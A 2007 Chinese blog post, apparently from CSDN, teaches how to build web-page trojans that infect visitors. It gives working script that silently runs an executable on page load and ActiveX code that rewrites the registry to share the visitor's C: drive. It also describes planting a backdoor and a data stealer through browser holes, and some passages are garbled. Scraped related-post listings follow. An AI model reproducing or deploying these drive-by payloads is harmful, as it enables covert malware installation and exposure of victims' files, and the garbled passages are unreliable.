教你如何制作网页木马

原创 2007年10月03日 17:11:00
大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。
1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:
<script language="javascript">
run_exe="<OBJECT ID=/"RUNIT/" WIDTH=0 HEIGHT=0 TYPE=/"application/x-oleobject/""
run_exe+="CODEBASE=/"test.exe#version=1,1,1,1/">"
run_exe+="<PARAM NAME=/"_Version/" value=/"65536/">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。
2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:http://dhj.126.com连接目标地址里...褪枪蚕砹恿恕?/a>
这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。

3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址http://dhj.126.com实际上就是一个转...憧梢酝ü齮elnet x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。
这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦
好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处
 

Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1804019

 

常见JS挂马方法及如何防止网站被黑客挂马?

最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定。可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因。最后发现是网站被挂马了,导致网站被连累了。在此,借助seo思维博客的平台...
  • z10160
  • z10160
  • 2013年09月22日 08:02
  • 2187

网站被黑中毒WebShell木马的解决方案

收到客户的反馈,说运行了一年的网站突然遭到黑客的攻击,系统cpu一直保持在100%,有进程也干不掉,然后客户就进行杀毒了,然后就把所有的exe文件都杀了,然后系统也就很多功能不正常了,数据库的服务也干...
  • huangxiangec
  • huangxiangec
  • 2014年02月13日 11:10
  • 9631

网站被黑检测-网页挂马及暗链检测

网页挂马及暗链检测   什么是网页挂马  网页挂马是指恶意攻击者攻击WEB网站后,在网页中嵌入一段代码或脚本,用于自动下载带有特定目的木马程序,而恶意攻击者实施恶意代码或脚本植入的行为通常称为“挂马”...
  • inrgihc
  • inrgihc
  • 2016年03月26日 23:34
  • 2647

利用木马程序制作网页 窃取他人钱财获得刑罚

法制网郑州12月9日电(杨东风 通讯员 孙建设 张鹏飞)以卖游戏币为由,利用木马程序更改他人网银中的交易金额,从而窃取他人钱财。近日,被告人唐某、邓某、曹某因犯盗窃罪经焦作市博爱县检察院提起公诉后分别...
  • u014162695
  • u014162695
  • 2014年03月17日 10:26
  • 490

教你如何制作网页

  • 2014年05月15日 10:58
  • 34KB
  • 下载

教你制作网页

  • 2007年08月12日 10:33
  • 189KB
  • 下载

网页制作宝典_教你怎么制作网页

  • 2013年04月08日 09:49
  • 28KB
  • 下载

jQuery快速高效制作网页交互特效第五章课后5

shangji4.html *{ margin:0px; padding:0px; font-size:12px; } a{ color:#174DAD; text-de...
  • qq_36074064
  • qq_36074064
  • 2017年04月26日 17:09
  • 359

DIV+CSS制作网页之如何设置z-index|DIV/CSS

网页制作Webjx文章简介:貌似很多同学对为什么这个div在上层,那个div在下层、无论如何设置z-index都无法居上的问题纠结抓狂、上吐下泻、恶心失眠、郁郁而终,致使不敢随意使用层的叠加。但层的叠...
  • yjl3039
  • yjl3039
  • 2014年08月27日 14:28
  • 852

Cleaver快速制作网页PPT

原文链接:http://www.jeffjade.com/2015/10/15/2015-10-16-cleaver-make-ppt/写在开始之前互联网时代,以浏览器作为入口,已经有越来越多的桌面应...
  • cloudJeff
  • cloudJeff
  • 2015年10月16日 17:50
  • 463
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:教你如何制作网页木马
举报原因:
原因补充:

(最多只允许输入30个字)